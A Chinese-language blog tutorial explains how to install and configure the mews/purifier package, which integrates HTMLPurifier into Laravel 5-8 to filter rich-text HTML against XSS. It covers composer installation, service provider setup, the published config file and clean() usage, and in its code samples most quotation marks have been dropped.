Laravel 5/6/7/8 使用mews/purifier 集成 HTMLPurifier 防止XSS跨站攻击

Song1731 次浏览0个评论2021年01月28日

今天我们主要分享在Laravel 5.*中使用mews/purifier扩展包集成HTMLPurifier防止 XSS跨站攻击,我们也知道laravel在安全方面一直也在追求更好,我们在日常的使用中使用{{}}即可轻松防止XSS攻击,但是当我们使用laravel 编写的富文本时(比如文章详情,用户评论等等)我们需要使用{!! !!}让我们的站点解析代码,这时候就需要考虑过滤代码。

HTMLPurifier是基于 PHP 编写的富文本HTML[=过滤器,通常我们可以使用它来防止XSS跨站攻击,更多关于HTMLPurifier的详情请参考HTMLPurifier官网

一、Purifier安装

Purifier 是在Laravel 5.* 中集成 HTMLPurifier 的扩展包,我们可以通过Composer来安装这扩展:

1、使用composer require安装
composer require mews/purifier

推荐使用如上方法安装,他不会更新其他composer包,节约我们的安装时间

2、使用composer update安装

在composer.js的require中添加"mews/purifier": "~3.0"然后执行composer update即可完成安装

{
    "require": {
        "laravel/framework": "~5.0",
        "mews/purifier": "~3.0",
    }
}

二、配置

1、Laravel 5.0 到 5.4:

在上面完成安装后,我们需要在配置文件config/app.phpproviders中注册HTMLPurifier服务提供者:

providers => [
    // ...
    Mews\Purifier\PurifierServiceProvider::class,
]

然后在aliases中注册Purifier门面:

aliases => [
    // ...
    Purifier => Mews\Purifier\Facades\Purifier::class,
]

2、Laravel 5.5+以后版本

务提供者将被自动加载。您不需要在任何地方添加依赖程序。

3、执行配置

添加完上面的配置,我们要使用自定义的配置,需要发布配置文件到config目录:

php artisan vendor:publish --provider="Mews\Purifier\PurifierServiceProvider"

会生成config/purifier.php配置文件,内容如下代码所示:

return [
    encoding      => UTF-8,
    finalize      => true,
    cachePath     => storage_path(app/purifier),
    cacheFileMode => 0755,
    settings      => [
        default => [
            HTML.Doctype             => HTML 4.01 Transitional,
            HTML.Allowed             => div,b,strong,i,em,u,a[href|title],ul,ol,li,p[style],br,span[style],img[width|height|alt|src],
            CSS.AllowedProperties    => font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align,
            AutoFormat.AutoParagraph => true,
            AutoFormat.RemoveEmpty   => true,
        ],
        test    => [
            Attr.EnableID => true,
        ],
        "youtube" => [
            "HTML.SafeIframe"      => true,
            "URI.SafeIframeRegexp" => "%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%",
        ],
        custom_definition => [
            id  => html5-definitions,
            rev => 1,
            debug => false,
            elements => [
                // http://developers.whatwg.org/sections.html
                [section, Block, Flow, Common],
                [nav,     Block, Flow, Common],
                [article, Block, Flow, Common],
                [aside,   Block, Flow, Common],
                [header,  Block, Flow, Common],
                [footer,  Block, Flow, Common],

                // Content model actually excludes several tags, not modelled here
                [address, Block, Flow, Common],
                [hgroup, Block, Required: h1 | h2 | h3 | h4 | h5 | h6, Common],

                // http://developers.whatwg.org/grouping-content.html
                [figure, Block, Optional: (figcaption, Flow) | (Flow, figcaption) | Flow, Common],
                [figcaption, Inline, Flow, Common],

                // http://developers.whatwg.org/the-video-element.html#the-video-element
                [video, Block, Optional: (source, Flow) | (Flow, source) | Flow, Common, [
                    src => URI,
                    type => Text,
                    width => Length,
                    height => Length,
                    poster => URI,
                    preload => Enum#auto,metadata,none,
                    controls => Bool,
                ]],
                [source, Block, Flow, Common, [
                    src => URI,
                    type => Text,
                ]],

                // http://developers.whatwg.org/text-level-semantics.html
                [s,    Inline, Inline, Common],
                [var,  Inline, Inline, Common],
                [sub,  Inline, Inline, Common],
                [sup,  Inline, Inline, Common],
                [mark, Inline, Inline, Common],
                [wbr,  Inline, Empty, Core],

                // http://developers.whatwg.org/edits.html
                [ins, Block, Flow, Common, [cite => URI, datetime => CDATA]],
                [del, Block, Flow, Common, [cite => URI, datetime => CDATA]],
            ],
            attributes => [
                [iframe, allowfullscreen, Bool],
                [table, height, Text],
                [td, border, Text],
                [th, border, Text],
                [tr, width, Text],
                [tr, height, Text],
                [tr, border, Text],
            ],
        ],
        custom_attributes => [
            [a, target, Enum#_blank,_self,_target,_top],
        ],
        custom_elements => [
            [u, Inline, Inline, Common],
        ],
    ],

];

三、Purifier的使用

默认

clean(Input::get(inputname));

或者

Purifier::clean(Input::get(inputname));

动态配置

clean(This is my H1 title, titles);
clean(This is my H1 title, array(Attr.EnableID => true));

或者

Purifier::clean(This is my H1 title, titles);
Purifier::clean(This is my H1 title, array(Attr.EnableID => true));

使用URI filter

Purifier::clean(This is my H1 title, titles, function (HTMLPurifier_Config $config) {
    $uri = $config->getDefinition(URI);
    $uri->addFilter(new HTMLPurifier_URIFilter_NameOfFilter(), $config);
});

Laravel 4参考 HTMLPurifier for Laravel 4

Laravel 5参考 Laravel5.*使用Purifier扩展包集成 HTMLPurifier轻松防止XSS跨站攻击

常见问题

  • 在你初次使用Purifier回默认生成一个<p></p>标签,非常方便使用,需要才config/purifier.php中修改参数:
    AutoFormat.AutoParagraph => false,

Github地址: HTMLPurifier for Laravel 5/6/7/8

提交评论

请登录后评论

用户评论

    当前暂无评价,快来发表您的观点吧...

更多相关好文